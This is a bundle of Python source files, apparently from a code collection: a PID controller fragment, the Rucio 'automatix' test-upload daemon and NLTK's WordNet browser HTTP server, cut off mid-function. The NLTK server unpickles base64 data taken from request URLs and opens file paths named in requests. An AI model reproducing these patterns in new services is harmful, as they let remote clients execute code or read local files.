self._timer = 0
return self.yaw_p * self.error
class PID(object):
"""Simple PID controller."""
def __init__(self, Kp=1.0, Ki=0.0, Kd=0.0, setpoint=0, sample_time=0.01, output_limits=(None, None)):
self.Kp, self.Ki, self.Kd = Kp, Ki, Kd
self.setpoint = setpoint
self.sample_time = sample_time
self._min_output, self._max_output = output_limits
def __call__(self, input_):
"""
Call the PID controller with *input_* and calculate and return a control output if sample_time seconds has
passed since the last update. If no new output is calculated, return the previous output instead (or None if
no value has been calculated yet).
:param dt: If set, uses this value for timestep instead of real time. This can be used in simulations when
simulation time is different from real time.
"""
now = time.monotonic()
try:
dt = now - self._last_time
except AttributeError:
dt = 1e-16
try:
if self.sample_time is not None and dt < self.sample_time and self._last_output is not None:
# only update every sample_time seconds
return self._last_output
except AttributeError:
pass
# compute error terms
error = self.setpoint - input_
try:
d_input = input_ - (self._last_input if self._last_input is not None else input_)
except AttributeError:
d_input = 0
# compute the proportional term
self._proportional = self.Kp * error
# compute integral and derivative terms
try:
self._integral += self.Ki * error * dt
except AttributeError:
self._integral = self.Ki * error * dt
self._integral = self.clamp(self._integral, self.output_limits) # avoid integral windup
self._derivative = -self.Kd * d_input / dt
# compute final output
output = self._proportional + self._integral + self._derivative
output = self.clamp(output, self.output_limits)
# keep track of state
self._last_output = output
self._last_input = input_
self._last_time = now
return output
def clamp(self, value, limits):
lower, upper = limits
if value is None:
return None
elif upper is not None and value > upper:
return upper
elif lower is not None and value < lower:
return lower
return value
@property
def components(self):
"""
The P-, I- and D-terms from the last computation as separate components as a tuple. Useful for visualizing
what the controller is doing or when tuning hard-to-tune systems.
"""
return self._proportional, self._integral, self._derivative
@property
def output_limits(self):
"""
The current output limits as a 2-tuple: (lower, upper). See also the *output_limts* parameter in
:meth:`PID.__init__`.
"""
return self._min_output, self._max_output
|
automatix.py | # -*- coding: utf-8 -*-
# Copyright 2018-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Mario Lassnig <mario.lassnig@cern.ch>, 2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - Brandon White <bjwhite@fnal.gov>, 2019
# - Cedric Serfon <cedric.serfon@cern.ch>, 2020
# - Eli Chadwick <eli.chadwick@stfc.ac.uk>, 2020
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
# - Thomas Beermann <thomas.beermann@cern.ch>, 2020-2021
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020
# - David Población Criado <david.poblacion.criado@cern.ch>, 2021
# - Radu Carpa <radu.carpa@cern.ch>, 2021
from __future__ import division
import logging
import random
import socket
import tempfile
import threading
from datetime import datetime
from json import load
from math import exp
from os import remove, rmdir, stat, getpid
from time import sleep, time
import rucio.db.sqla.util
from rucio.client import Client
from rucio.common import exception
from rucio.common.exception import FileReplicaAlreadyExists, ConfigNotFound
from rucio.common.logging import formatted_logger, setup_logging
from rucio.common.types import InternalScope
from rucio.common.utils import adler32, daemon_sleep
from rucio.common.utils import execute, generate_uuid
from rucio.core import monitor, heartbeat
from rucio.core.config import get
from rucio.core.scope import list_scopes
from rucio.rse import rsemanager as rsemgr
SUCCESS = 0
FAILURE = 1
GRACEFUL_STOP = threading.Event()
def upload(files, scope, metadata, rse, account, source_dir, dataset_lifetime, did=None, set_metadata=False, logger=logging.log):
logger(logging.DEBUG, 'In upload')
dsn = None
if did:
dsn = {'scope': did.split(':')[0], 'name': did.split(':')[1]}
client = Client()
list_files = []
lfns = []
for filename in files:
physical_fname = filename
if physical_fname.find('/') > -1:
physical_fname = "".join(filename.split('/'))
fullpath = '%s/%s' % (source_dir, physical_fname)
size = stat(fullpath).st_size
checksum = adler32(fullpath)
logger(logging.INFO, 'File %s : Size %s , adler32 %s', fullpath, str(size), checksum)
list_files.append({'scope': scope, 'name': filename, 'bytes': size, 'adler32': checksum, 'meta': {'guid': generate_uuid()}})
lfns.append({'name': filename, 'scope': scope, 'filesize': size, 'adler32': checksum, 'filename': physical_fname})
# Physical upload
logger(logging.INFO, 'Uploading physically the files %s on %s', str(lfns), rse)
rse_info = rsemgr.get_rse_info(rse, vo=client.vo)
try:
success_upload = True
for cnt in range(0, 3):
rows = rsemgr.upload(rse_info, lfns=lfns, source_dir=source_dir, logger=logger)
# temporary hack
global_status, ret = rows['success'], rows[1]
logger(logging.INFO, 'Returned global status : %s, Returned : %s', str(global_status), str(ret))
if not global_status:
for item in ret:
if (not isinstance(ret[item], FileReplicaAlreadyExists)) and ret[item] is not True:
sleep(exp(cnt))
success_upload = False
logger(logging.ERROR, 'Problem to upload file %s with error %s', item, str(ret[item]))
break
else:
break
if not success_upload:
logger(logging.ERROR, 'Upload operation to %s failed, removing leftovers', rse)
rsemgr.delete(rse_info, lfns=lfns)
return False
except Exception as error:
logger(logging.DEBUG, "Exception", exc_info=True)
logger(logging.ERROR, '%s', str(error))
return False
logger(logging.INFO, 'Files successfully copied on %s', rse)
# Registering DIDs and replicas in Rucio
logger(logging.INFO, 'Registering DIDs and replicas in Rucio')
meta = metadata
if not set_metadata:
meta = None
if dsn:
try:
client.add_dataset(scope=dsn['scope'], name=dsn['name'], rules=[{'account': account, 'copies': 1, 'rse_expression': rse, 'grouping': 'DATASET', 'activity': 'Functional Test'}], meta=meta, lifetime=dataset_lifetime)
client.add_files_to_dataset(scope=dsn['scope'], name=dsn['name'], files=list_files, rse=rse)
logger(logging.INFO, 'Upload operation for %s:%s done', dsn['scope'], dsn['name'])
except Exception as error:
logger(logging.DEBUG, "Exception", exc_info=True)
logger(logging.ERROR, 'Failed to upload %s', str(list_files))
logger(logging.ERROR, '%s', str(error))
logger(logging.ERROR, 'removing files from the Storage')
rsemgr.delete(rse_info, lfns=lfns)
return False
else:
logger(logging.WARNING, 'No dsn is specified')
try:
client.add_replicas(files=list_files, rse=rse)
client.add_replication_rule(list_files, copies=1, rse_expression=rse, activity='Functional Test')
logger(logging.INFO, 'Upload operation for %s done', str(list_files))
except Exception as error:
logger(logging.DEBUG, "Exception", exc_info=True)
logger(logging.ERROR, 'Failed to upload %s', str(list_files))
logger(logging.ERROR, '%s', str(error))
logger(logging.ERROR, 'Removing files from the Storage')
rsemgr.delete(rse_info, lfns=lfns)
return False
return True
def get_data_distribution(inputfile):
with open(inputfile) as data_file:
data = load(data_file)
probabilities = {}
probability = 0
for key in data:
probability += data[key]['probability']
probabilities[key] = probability
for key in probabilities:
probabilities[key] = float(probabilities[key]) / probability
return probabilities, data
def choose_element(probabilities, data):
rnd = random.uniform(0, 1)
prob = 0
for key in probabilities:
prob = probabilities[key]
if prob >= rnd:
return data[key]
return data[key]
def generate_file(fname, size, logger=logging.log):
cmd = '/bin/dd if=/dev/urandom of=%s bs=%s count=1' % (fname, size)
exitcode, out, err = execute(cmd)
logger(logging.DEBUG, out)
logger(logging.DEBUG, err)
return exitcode
def generate_didname(metadata, dsn, did_type):
try:
did_prefix = get('automatix', 'did_prefix')
except ConfigNotFound:
did_prefix = ''
try:
pattern = get('automatix', '%s_pattern' % did_type)
separator = get('automatix', 'separator')
except ConfigNotFound:
return generate_uuid()
fields = pattern.split(separator)
file_name = ''
for field in fields:
if field == 'date':
field_str = str(datetime.now().date())
elif field == 'did_prefix':
field_str = did_prefix
elif field == 'dsn':
field_str = dsn
elif field == 'uuid':
field_str = generate_uuid()
elif field == 'randint':
field_str = str(random.randint(0, 100000))
else:
field_str = metadata.get(field, None)
if not field_str:
field_str = str(random.randint(0, 100000))
file_name = '%s%s%s' % (file_name, separator, field_str)
len_separator = len(separator)
return file_name[len_separator:]
def automatix(sites, inputfile, sleep_time, account, worker_number=1, total_workers=1, scope='tests', once=False, dataset_lifetime=None, set_metadata=False):
sleep(sleep_time * (total_workers - worker_number) / total_workers)
executable = 'automatix'
hostname = socket.getfqdn()
pid = getpid()
hb_thread = threading.current_thread()
heartbeat.sanity_check(executable=executable, hostname=hostname)
prefix = 'automatix[%i/%i] : ' % (worker_number, total_workers)
logger = formatted_logger(logging.log, prefix + '%s')
while not GRACEFUL_STOP.is_set():
heartbeat.live(executable, hostname, pid, hb_thread)
starttime = time()
prefix = 'automatix[%i/%i] : ' % (worker_number, total_workers)
logger = formatted_logger(logging.log, prefix + '%s')
logger(logging.INFO, 'Getting data distribution')
probabilities, data = get_data_distribution(inputfile)
logger(logging.DEBUG, 'Probabilities %s', probabilities)
totretries = 3
status = False
for site in sites:
for retry in range(0, totretries):
start_time = time()
tmpdir = tempfile.mkdtemp()
logger(logging.INFO, 'Running on site %s', site)
dic = choose_element(probabilities, data)
metadata = dic['metadata']
try:
nbfiles = dic['nbfiles']
except KeyError:
nbfiles = 2
logger(logging.WARNING, 'No nbfiles defined in the configuration, will use 2')
try:
filesize = dic['filesize']
except KeyError:
filesize = 1000000
logger(logging.WARNING, 'No filesize defined in the configuration, will use 1M files')
dsn = generate_didname(metadata, None, 'dataset')
fnames = []
lfns = []
physical_fnames = []
for _ in range(nbfiles):
fname = generate_didname(metadata=metadata, dsn=dsn, did_type='file')
lfns.append(fname)
logger(logging.INFO, 'Generating file %s in dataset %s', fname, dsn)
physical_fname = '%s/%s' % (tmpdir, "".join(fname.split('/')))
physical_fnames.append(physical_fname)
generate_file(physical_fname, filesize, logger=logger)
fnames.append(fname)
logger(logging.INFO, 'Upload %s to %s', dsn, site)
dsn = '%s:%s' % (scope, dsn)
status = upload(files=lfns, scope=scope, metadata=metadata, rse=site, account=account, source_dir=tmpdir, dataset_lifetime=dataset_lifetime, did=dsn, set_metadata=set_metadata, logger=logger)
for physical_fname in physical_fnames:
remove(physical_fname)
rmdir(tmpdir)
if status:
monitor.record_counter(name='automatix.addnewdataset.done', delta=1)
monitor.record_counter(name='automatix.addnewfile.done', delta=nbfiles)
monitor.record_timer('automatix.datasetinjection', (time() - start_time) * 1000)
break
else:
logger(logging.INFO, 'Failed to upload files. Will retry another time (attempt %s/%s)', str(retry + 1), str(totretries))
if once is True:
logger(logging.INFO, 'Run with once mode. Exiting')
break
tottime = time() - starttime
if status:
logger(logging.INFO, 'It took %s seconds to upload one dataset on %s', str(tottime), str(sites))
daemon_sleep(start_time=starttime, sleep_time=sleep_time, graceful_stop=GRACEFUL_STOP, logger=logger)
else:
logger(logging.INFO, 'Retrying a new upload')
heartbeat.die(executable, hostname, pid, hb_thread)
logger(logging.INFO, 'Graceful stop requested')
logger(logging.INFO, 'Graceful stop done')
def run(total_workers=1, once=False, inputfile=None, sleep_time=-1):
"""
Starts up the automatix threads.
"""
setup_logging()
if rucio.db.sqla.util.is_old_db():
raise exception.DatabaseException('Database was not updated, daemon won\'t start')
try:
sites = [s.strip() for s in get('automatix', 'sites').split(',')]
except Exception:
raise Exception('Could not load sites from configuration')
if not inputfile:
inputfile = '/opt/rucio/etc/automatix.json'
if sleep_time == -1:
try:
sleep_time = get('automatix', 'sleep_time')
except Exception:
sleep_time = 30
try:
account = get('automatix', 'account')
except Exception:
account = 'root'
try:
dataset_lifetime = get('automatix', 'dataset_lifetime')
except Exception:
dataset_lifetime = None
try:
set_metadata = get('automatix', 'set_metadata')
except Exception:
set_metadata = False
try:
scope = get('automatix', 'scope')
client = Client()
filters = {'scope': InternalScope('*', vo=client.vo)}
if InternalScope(scope, vo=client.vo) not in list_scopes(filter_=filters):
logging.log(logging.ERROR, 'Scope %s does not exist. Exiting', scope)
GRACEFUL_STOP.set()
except Exception:
scope = False
threads = list()
for worker_number in range(0, total_workers):
kwargs = {'worker_number': worker_number,
'total_workers': total_workers,
'once': once,
'sites': sites,
'sleep_time': sleep_time,
'account': account,
'inputfile': inputfile,
'set_metadata': set_metadata,
'scope': scope,
'dataset_lifetime': dataset_lifetime}
threads.append(threading.Thread(target=automatix, kwargs=kwargs))
[thread.start() for thread in threads]
while threads[0].is_alive():
logging.log(logging.DEBUG, 'Still %i active threads', len(threads))
[thread.join(timeout=3.14) for thread in threads]
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
GRACEFUL_STOP.set()
|
wordnet_app.py | # Natural Language Toolkit: WordNet Browser Application
#
# Copyright (C) 2001-2021 NLTK Project
# Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
# Paul Bone <pbone@students.csse.unimelb.edu.au>
# URL: <https://www.nltk.org/>
# For license information, see LICENSE.TXT
"""
A WordNet Browser application which launches the default browser
(if it is not already running) and opens a new tab with a connection
to http://localhost:port/ . It also starts an HTTP server on the
specified port and begins serving browser requests. The default
port is 8000. (For command-line help, run "python wordnet -h")
This application requires that the user's web browser supports
Javascript.
BrowServer is a server for browsing the NLTK Wordnet database It first
launches a browser client to be used for browsing and then starts
serving the requests of that and maybe other clients
Usage::
browserver.py -h
browserver.py [-s] [-p <port>]
Options::
-h or --help
Display this help message.
-l <file> or --log-file <file>
Logs messages to the given file, If this option is not specified
messages are silently dropped.
-p <port> or --port <port>
Run the web server on this TCP port, defaults to 8000.
-s or --server-mode
Do not start a web browser, and do not allow a user to
shutdown the server through the web interface.
"""
# TODO: throughout this package variable names and docstrings need
# modifying to be compliant with NLTK's coding standards. Tests also
# need to be develop to ensure this continues to work in the face of
# changes to other NLTK packages.
import base64
import copy
import datetime
import getopt
import os
import pickle
import re
import sys
import threading
import time
import webbrowser
from collections import defaultdict
from http.server import BaseHTTPRequestHandler, HTTPServer
# Allow this program to run inside the NLTK source tree.
from sys import argv, path
from urllib.parse import unquote_plus
from nltk.corpus import wordnet as wn
from nltk.corpus.reader.wordnet import Lemma, Synset
# now included in local file
# from util import html_header, html_trailer, \
# get_static_index_page, get_static_page_by_path, \
# page_from_word, page_from_href
firstClient = True
# True if we're not also running a web browser. The value f server_mode
# gets set by demo().
server_mode = None
# If set this is a file object for writing log messages.
logfile = None
class MyServerHandler(BaseHTTPRequestHandler):
def do_HEAD(self):
self.send_head()
def do_GET(self):
global firstClient
sp = self.path[1:]
if unquote_plus(sp) == "SHUTDOWN THE SERVER":
if server_mode:
page = "Server must be killed with SIGTERM."
type = "text/plain"
else:
print("Server shutting down!")
os._exit(0)
elif sp == "": # First request.
type = "text/html"
if not server_mode and firstClient:
firstClient = False
page = get_static_index_page(True)
else:
page = get_static_index_page(False)
word = "green"
elif sp.endswith(".html"): # Trying to fetch a HTML file TODO:
type = "text/html"
usp = unquote_plus(sp)
if usp == "NLTK Wordnet Browser Database Info.html":
word = "* Database Info *"
if os.path.isfile(usp):
with open(usp) as infile:
page = infile.read()
else:
page = (
(html_header % word) + "<p>The database info file:"
"<p><b>"
+ usp
+ "</b>"
+ "<p>was not found. Run this:"
+ "<p><b>python dbinfo_html.py</b>"
+ "<p>to produce it."
+ html_trailer
)
else:
# Handle files here.
word = sp
page = get_static_page_by_path(usp)
elif sp.startswith("search"):
# This doesn't seem to work with MWEs.
type = "text/html"
parts = (sp.split("?")[1]).split("&")
word = [
p.split("=")[1].replace("+", " ")
for p in parts
if p.startswith("nextWord")
][0]
page, word = page_from_word(word)
elif sp.startswith("lookup_"):
# TODO add a variation of this that takes a non ecoded word or MWE.
type = "text/html"
sp = sp[len("lookup_") :]
page, word = page_from_href(sp)
elif sp == "start_page":
# if this is the first request we should display help
# information, and possibly set a default word.
type = "text/html"
page, word = page_from_word("wordnet")
else:
type = "text/plain"
page = "Could not parse request: '%s'" % sp
# Send result.
self.send_head(type)
self.wfile.write(page.encode("utf8"))
def send_head(self, type=None):
self.send_response(200)
self.send_header("Content-type", type)
self.end_headers()
def log_message(self, format, *args):
global logfile
if logfile:
logfile.write(
"%s - - [%s] %s\n"
% (self.address_string(), self.log_date_time_string(), format % args)
)
def get_unique_counter_from_url(sp):
"""
Extract the unique counter from the URL if it has one. Otherwise return
null.
"""
pos = sp.rfind("%23")
if pos != -1:
return int(sp[(pos + 3) :])
else:
return None
def wnb(port=8000, runBrowser=True, logfilename=None):
"""
Run NLTK Wordnet Browser Server.
:param port: The port number for the server to listen on, defaults to
8000
:type port: int
:param runBrowser: True to start a web browser and point it at the web
server.
:type runBrowser: bool
"""
# The webbrowser module is unpredictable, typically it blocks if it uses
# a console web browser, and doesn't block if it uses a GUI webbrowser,
# so we need to force it to have a clear correct behaviour.
#
# Normally the server should run for as long as the user wants. they
# should idealy be able to control this from the UI by closing the
# window or tab. Second best would be clicking a button to say
# 'Shutdown' that first shutsdown the server and closes the window or
# tab, or exits the text-mode browser. Both of these are unfreasable.
#
# The next best alternative is to start the server, have it close when
# it receives SIGTERM (default), and run the browser as well. The user
# may have to shutdown both programs.
#
# Since webbrowser may block, and the webserver will block, we must run
# them in separate threads.
#
global server_mode, logfile
server_mode = not runBrowser
# Setup logging.
if logfilename:
try:
logfile = open(logfilename, "a", 1) # 1 means 'line buffering'
except OSError as e:
sys.stderr.write("Couldn't open %s for writing: %s", logfilename, e)
sys.exit(1)
else:
logfile = None
# Compute URL and start web browser
url = "http://localhost:" + str(port)
server_ready = None
browser_thread = None
if runBrowser:
server_ready = threading.Event()
browser_thread = startBrowser(url, server_ready)
# Start the server.
server = HTTPServer(("", port), MyServerHandler)
if logfile:
logfile.write("NLTK Wordnet browser server running serving: %s\n" % url)
if runBrowser:
server_ready.set()
try:
server.serve_forever()
except KeyboardInterrupt:
pass
if runBrowser:
browser_thread.join()
if logfile:
logfile.close()
def startBrowser(url, server_ready):
def run():
server_ready.wait()
time.sleep(1) # Wait a little bit more, there's still the chance of
# a race condition.
webbrowser.open(url, new=2, autoraise=1)
t = threading.Thread(target=run)
t.start()
return t
#####################################################################
# Utilities
#####################################################################
"""
WordNet Browser Utilities.
This provides a backend to both wxbrowse and browserver.py.
"""
################################################################################
#
# Main logic for wordnet browser.
#
# This is wrapped inside a function since wn is only available if the
# WordNet corpus is installed.
def _pos_tuples():
return [
(wn.NOUN, "N", "noun"),
(wn.VERB, "V", "verb"),
(wn.ADJ, "J", "adj"),
(wn.ADV, "R", "adv"),
]
def _pos_match(pos_tuple):
"""
This function returns the complete pos tuple for the partial pos
tuple given to it. It attempts to match it against the first
non-null component of the given pos tuple.
"""
if pos_tuple[0] == "s":
pos_tuple = ("a", pos_tuple[1], pos_tuple[2])
for n, x in enumerate(pos_tuple):
if x is not None:
break
for pt in _pos_tuples():
if pt[n] == pos_tuple[n]:
return pt
return None
HYPONYM = 0
HYPERNYM = 1
CLASS_REGIONAL = 2
PART_HOLONYM = 3
PART_MERONYM = 4
ATTRIBUTE = 5
SUBSTANCE_HOLONYM = 6
SUBSTANCE_MERONYM = 7
MEMBER_HOLONYM = 8
MEMBER_MERONYM = 9
VERB_GROUP = 10
INSTANCE_HYPONYM = 12
INSTANCE_HYPERNYM = 13
CAUSE = 14
ALSO_SEE = 15
SIMILAR = 16
ENTAILMENT = 17
ANTONYM = 18
FRAMES = 19
PERTAINYM = 20
CLASS_CATEGORY = 21
CLASS_USAGE = 22
CLASS_REGIONAL = 23
CLASS_USAGE = 24
CLASS_CATEGORY = 11
DERIVATIONALLY_RELATED_FORM = 25
INDIRECT_HYPERNYMS = 26
def lemma_property(word, synset, func):
def flattern(l):
if l == []:
return []
else:
return l[0] + flattern(l[1:])
return flattern([func(l) for l in synset.lemmas if l.name == word])
def rebuild_tree(orig_tree):
node = orig_tree[0]
children = orig_tree[1:]
return (node, [rebuild_tree(t) for t in children])
def get_relations_data(word, synset):
"""
Get synset relations data for a synset. Note that this doesn't
yet support things such as full hyponym vs direct hyponym.
"""
if synset.pos() == wn.NOUN:
return (
(HYPONYM, "Hyponyms", synset.hyponyms()),
(INSTANCE_HYPONYM, "Instance hyponyms", synset.instance_hyponyms()),
(HYPERNYM, "Direct hypernyms", synset.hypernyms()),
(
INDIRECT_HYPERNYMS,
"Indirect hypernyms",
rebuild_tree(synset.tree(lambda x: x.hypernyms()))[1],
),
# hypernyms', 'Sister terms',
(INSTANCE_HYPERNYM, "Instance hypernyms", synset.instance_hypernyms()),
# (CLASS_REGIONAL, ['domain term region'], ),
(PART_HOLONYM, "Part holonyms", synset.part_holonyms()),
(PART_MERONYM, "Part meronyms", synset.part_meronyms()),
(SUBSTANCE_HOLONYM, "Substance holonyms", synset.substance_holonyms()),
(SUBSTANCE_MERONYM, "Substance meronyms", synset.substance_meronyms()),
(MEMBER_HOLONYM, "Member holonyms", synset.member_holonyms()),
(MEMBER_MERONYM, "Member meronyms", synset.member_meronyms()),
(ATTRIBUTE, "Attributes", synset.attributes()),
(ANTONYM, "Antonyms", lemma_property(word, synset, lambda l: l.antonyms())),
(
DERIVATIONALLY_RELATED_FORM,
"Derivationally related form",
lemma_property(
word, synset, lambda l: l.derivationally_related_forms()
),
),
)
elif synset.pos() == wn.VERB:
return (
(ANTONYM, "Antonym", lemma_property(word, synset, lambda l: l.antonyms())),
(HYPONYM, "Hyponym", synset.hyponyms()),
(HYPERNYM, "Direct hypernyms", synset.hypernyms()),
(
INDIRECT_HYPERNYMS,
"Indirect hypernyms",
rebuild_tree(synset.tree(lambda x: x.hypernyms()))[1],
),
(ENTAILMENT, "Entailments", synset.entailments()),
(CAUSE, "Causes", synset.causes()),
(ALSO_SEE, "Also see", synset.also_sees()),
(VERB_GROUP, "Verb Groups", synset.verb_groups()),
(
DERIVATIONALLY_RELATED_FORM,
"Derivationally related form",
lemma_property(
word, synset, lambda l: l.derivationally_related_forms()
),
),
)
elif synset.pos() == wn.ADJ or synset.pos == wn.ADJ_SAT:
return (
(ANTONYM, "Antonym", lemma_property(word, synset, lambda l: l.antonyms())),
(SIMILAR, "Similar to", synset.similar_tos()),
# Participle of verb - not supported by corpus
(
PERTAINYM,
"Pertainyms",
lemma_property(word, synset, lambda l: l.pertainyms()),
),
(ATTRIBUTE, "Attributes", synset.attributes()),
(ALSO_SEE, "Also see", synset.also_sees()),
)
elif synset.pos() == wn.ADV:
# This is weird. adverbs such as 'quick' and 'fast' don't seem
# to have antonyms returned by the corpus.a
return (
(ANTONYM, "Antonym", lemma_property(word, synset, lambda l: l.antonyms())),
)
# Derived from adjective - not supported by corpus
else:
raise TypeError("Unhandles synset POS type: " + str(synset.pos()))
html_header = """
<!DOCTYPE html PUBLIC '-//W3C//DTD HTML 4.01//EN'
'http://www.w3.org/TR/html4/strict.dtd'>
<html>
<head>
<meta name='generator' content=
'HTML Tidy for Windows (vers 14 February 2006), see www.w3.org'>
<meta http-equiv='Content-Type' content=
'text/html; charset=us-ascii'>
<title>NLTK Wordnet Browser display of: %s</title></head>
<body bgcolor='#F5F5F5' text='#000000'>
"""
html_trailer = """
</body>
</html>
"""
explanation = """
<h3>Search Help</h3>
<ul><li>The display below the line is an example of the output the browser
shows you when you enter a search word. The search word was <b>green</b>.</li>
<li>The search result shows for different parts of speech the <b>synsets</b>
i.e. different meanings for the word.</li>
<li>All underlined texts are hypertext links. There are two types of links:
word links and others. Clicking a word link carries out a search for the word
in the Wordnet database.</li>
<li>Clicking a link of the other type opens a display section of data attached
to that link. Clicking that link a second time closes the section again.</li>
<li>Clicking <u>S:</u> opens a section showing the relations for that synset.
</li>
<li>Clicking on a relation name opens a section that displays the associated
synsets.</li>
<li>Type a search word in the <b>Word</b> field and start the search by the
<b>Enter/Return</b> key or click the <b>Search</b> button.</li>
</ul>
<hr width='100%'>
"""
# HTML oriented functions
def _bold(txt):
return "<b>%s</b>" % txt
def _center(txt):
return "<center>%s</center>" % txt
def _hlev(n, txt):
return "<h%d>%s</h%d>" % (n, txt, n)
def _italic(txt):
return "<i>%s</i>" % txt
def _li(txt):
return "<li>%s</li>" % txt
def pg(word, body):
"""
Return a HTML page of NLTK Browser format constructed from the
word and body
:param word: The word that the body corresponds to
:type word: str
:param body: The HTML body corresponding to the word
:type body: str
:return: a HTML page for the word-body combination
:rtype: str
"""
return (html_header % word) + body + html_trailer
def _ul(txt):
return "<ul>" + txt + "</ul>"
def _abbc(txt):
"""
abbc = asterisks, breaks, bold, center
"""
return _center(_bold("<br>" * 10 + "*" * 10 + " " + txt + " " + "*" * 10))
full_hyponym_cont_text = _ul(_li(_italic("(has full hyponym continuation)"))) + "\n"
def _get_synset(synset_key):
"""
The synset key is the unique name of the synset, this can be
retrieved via synset.name()
"""
return wn.synset(synset_key)
def _collect_one_synset(word, synset, synset_relations):
"""
Returns the HTML string for one synset or word
:param word: the current word
:type word: str
:param synset: a synset
:type synset: synset
:param synset_relations: information about which synset relations
to display.
:type synset_relations: dict(synset_key, set(relation_id))
:return: The HTML string built for this synset
:rtype: str
"""
if isinstance(synset, tuple): # It's a word
raise NotImplementedError("word not supported by _collect_one_synset")
typ = "S"
pos_tuple = _pos_match((synset.pos(), None, None))
assert pos_tuple is not None, "pos_tuple is null: synset.pos(): %s" % synset.pos()
descr = pos_tuple[2]
ref = copy.deepcopy(Reference(word, synset_relations))
ref.toggle_synset(synset)
synset_label = typ + ";"
if synset.name() in synset_relations:
synset_label = _bold(synset_label)
s = f"<li>{make_lookup_link(ref, synset_label)} ({descr}) "
def format_lemma(w):
w = w.replace("_", " ")
if w.lower() == word:
return _bold(w)
else:
ref = Reference(w)
return make_lookup_link(ref, w)
s += ", ".join(format_lemma(l.name()) for l in synset.lemmas())
gl = " ({}) <i>{}</i> ".format(
synset.definition(),
"; ".join('"%s"' % e for e in synset.examples()),
)
return s + gl + _synset_relations(word, synset, synset_relations) + "</li>\n"
def _collect_all_synsets(word, pos, synset_relations=dict()):
"""
Return a HTML unordered list of synsets for the given word and
part of speech.
"""
return "<ul>%s\n</ul>\n" % "".join(
_collect_one_synset(word, synset, synset_relations)
for synset in wn.synsets(word, pos)
)
def _synset_relations(word, synset, synset_relations):
"""
Builds the HTML string for the relations of a synset
:param word: The current word
:type word: str
:param synset: The synset for which we're building the relations.
:type synset: Synset
:param synset_relations: synset keys and relation types for which to display relations.
:type synset_relations: dict(synset_key, set(relation_type))
:return: The HTML for a synset's relations
:rtype: str
"""
if not synset.name() in synset_relations:
return ""
ref = Reference(word, synset_relations)
def relation_html(r):
if isinstance(r, Synset):
return make_lookup_link(Reference(r.lemma_names()[0]), r.lemma_names()[0])
elif isinstance(r, Lemma):
return relation_html(r.synset())
elif isinstance(r, tuple):
# It's probably a tuple containing a Synset and a list of
# similar tuples. This forms a tree of synsets.
return "{}\n<ul>{}</ul>\n".format(
relation_html(r[0]),
"".join("<li>%s</li>\n" % relation_html(sr) for sr in r[1]),
)
else:
raise TypeError(
"r must be a synset, lemma or list, it was: type(r) = %s, r = %s"
% (type(r), r)
)
def make_synset_html(db_name, disp_name, rels):
synset_html = "<i>%s</i>\n" % make_lookup_link(
copy.deepcopy(ref).toggle_synset_relation(synset, db_name).encode(),
disp_name,
)
if db_name in ref.synset_relations[synset.name()]:
synset_html += "<ul>%s</ul>\n" % "".join(
"<li>%s</li>\n" % relation_html(r) for r in rels
)
return synset_html
html = (
"<ul>"
+ "\n".join(
"<li>%s</li>" % make_synset_html(*rel_data)
for rel_data in get_relations_data(word, synset)
if rel_data[2] != []
)
+ "</ul>"
)
return html
class Reference:
"""
A reference to a page that may be generated by page_word
"""
def __init__(self, word, synset_relations=dict()):
"""
Build a reference to a new page.
word is the word or words (separated by commas) for which to
search for synsets of
synset_relations is a dictionary of synset keys to sets of
synset relation identifaiers to unfold a list of synset
relations for.
"""
self.word = word
self.synset_relations = synset_relations
def encode(self):
"""
Encode this reference into a string to be used in a URL.
"""
# This uses a tuple rather than an object since the python
# pickle representation is much smaller and there is no need
# to represent the complete object.
string = pickle.dumps((self.word, self.synset_relations), -1)
return base64.urlsafe_b64encode(string).decode()
@staticmethod
def decode(string):
"""
Decode a reference encoded with Reference.encode
"""
string = base64.urlsafe_b64decode(string.encode())
word, synset_relations = pickle.loads(string)
return Reference(word, synset_relations)
def toggle_synset_relation(self, synset, relation):
"""
Toggle the display of the relations for the given synset and
relation type.
This function will throw a KeyError if the synset is currently
not being displayed.
"""
if relation in self.synset_relations[synset.name()]:
self.synset_relations[synset.name()].remove(relation)
else:
self.synset_relations[synset.name()].add(relation)
return self
def toggle_synset(self, synset):
"""
Toggle displaying of the relation types for the given synset
"""
if synset.name() in self.synset_relations:
del self.synset_relations[synset.name()]
else:
self.synset_relations[synset.name()] = set()
return self
def make_lookup_link(ref, label):
return f'<a href="lookup_{ref.encode()}">{label}</a>'
def page_from_word(word):
"""
Return a HTML page for the given word.
:type word: str
:param word: The currently active word
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
"""
return page_from_reference(Reference(word))
def page_from_href(href):
"""
Returns a tuple of the HTML page built and the new current word
:param href: The hypertext reference to be solved
:type href: str
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
"""
return page_from_reference(Reference.decode(href))
def page_from_reference(href):
"""
Returns a tuple of the HTML page built and the new current word
:param href: The hypertext reference to be solved
:type href: str
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
"""
word = href.word
pos_forms = defaultdict(list)
words = word.split(",")
words = [w for w in [w.strip().lower().replace(" ", "_") for w in words] if w != ""]
if len(words) == 0:
# No words were found.
return "", "Please specify a word to search for."
# This looks up multiple words at once. This is probably not
# necessary and may lead to problems.
for w in words:
for pos in [wn.NOUN, wn.VERB, wn.ADJ, wn.ADV]:
form = wn.morphy(w, pos)
if form and form not in pos_forms[pos]:
pos_forms[pos].append(form)
body = ""
for pos, pos_str, name in _pos_tuples():
if pos in pos_forms:
body += _hlev(3, name) + "\n"
for w in pos_forms[pos]:
